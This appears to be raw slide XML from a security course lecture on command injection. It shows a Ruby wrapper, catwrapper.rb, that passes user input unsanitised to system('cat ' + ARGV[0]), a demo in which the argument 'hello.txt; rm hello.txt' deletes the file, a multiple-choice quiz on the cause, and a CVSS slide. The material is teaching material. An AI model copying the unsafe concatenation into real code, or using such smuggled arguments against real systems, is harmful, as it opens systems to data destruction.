        <p:nvSpPr>
          <p:cNvPr id="508" name="Shape 508">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8ECB078-1FDE-DAAA-0853-A8C99F7C2BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar attacks via</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>untrusted inputs</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06489C07-2B24-A963-98AD-F534D2133874}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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376808810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4E69-ED37-2D29-6AF5-EF2196857FD3}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Shape 428">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E55EA8F-554C-637B-B607-6C2FC6537DDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593581" y="555966"/>
            <a:ext cx="23196838" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>What’s wrong with this Ruby code?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Shape 429">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BD1CB9F-42E1-21B0-0AB1-77EDC2BF81CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4782566" y="4595091"/>
            <a:ext cx="14603356" cy="7069242"/>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b="1" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> ARGV.length &lt; 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0"/>
              <a:t>then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  puts </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"required argument: textfile path"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  exit 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t># call cat command on given argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:satOff val="1488"/>
                    <a:lumOff val="-7242"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>+ARGV[0]) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>exit 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Shape 430">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A1D4312-C42F-4499-6A67-77EB2DD1A119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4773989" y="3384254"/>
            <a:ext cx="5392466" cy="153295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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr i="1"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:r>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14D5DCB-BAEC-A1D0-2E7C-55D3B4FBC489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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222597698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D9014-B019-05AA-CD7C-B95E9AF711EA}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Shape 448">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F37C0128-FAC0-CEE1-B6B5-44BDBDE3746F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909751" y="1322832"/>
            <a:ext cx="16719320" cy="11070337"/>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dirty="0"/>
              <a:t>&gt; ls </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>hello.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>&gt; ruby catwrapper.rb hello.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Hello world!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>&gt; ruby catwrapper.rb catwrapper.rb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>if ARGV.length &lt; 1 then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>  puts "required argument: textfile path”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>&gt; ruby </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>; rm </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Hello world!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>&gt; ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>catwrapper.rb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Shape 449">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDFA0B95-88C9-DFED-0B7D-D6DA4B85D4F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10058830" y="555966"/>
            <a:ext cx="13731589" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Possible Interaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D30DEE3D-3EC7-01A8-0AEA-181578760604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363100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48">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44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448">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44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448">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448">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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448">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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448">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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="448">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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="448">
                                            <p:txEl>
                                              <p:pRg st="13" end="1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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="448">
                                            <p:txEl>
                                              <p:pRg st="15" end="15"/>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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44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5BE9B-0234-62B4-E88A-68234F9FC62B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Vulnerability Scoring System (CVSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A2B61FF-E8A5-8704-686D-5E917EC97922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="3636335"/>
            <a:ext cx="15609094" cy="8834114"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Produces a vulnerability score, 0-10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Score can change over time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD47EBD0-3A58-836A-AE77-2E1F152654D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14338" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC28E33-A103-7007-57C3-65DD24588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850" y="5715984"/>
            <a:ext cx="16370300" cy="600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7348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32BF3-3424-17AF-724A-878D50A48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8FAD0-F086-CCD8-1F0A-BA4362862A49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370114" y="625078"/>
            <a:ext cx="23513143" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0"/>
              <a:t>Quiz 2: What happened?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3BDA78-EF14-CF22-408A-1A6274046FF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069218" y="3134320"/>
            <a:ext cx="9555240" cy="9336129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>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dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was given a file named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which doesn’t exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interpreted the string as having two commands, and executed them both</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="alphaUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was given three files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>hello.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
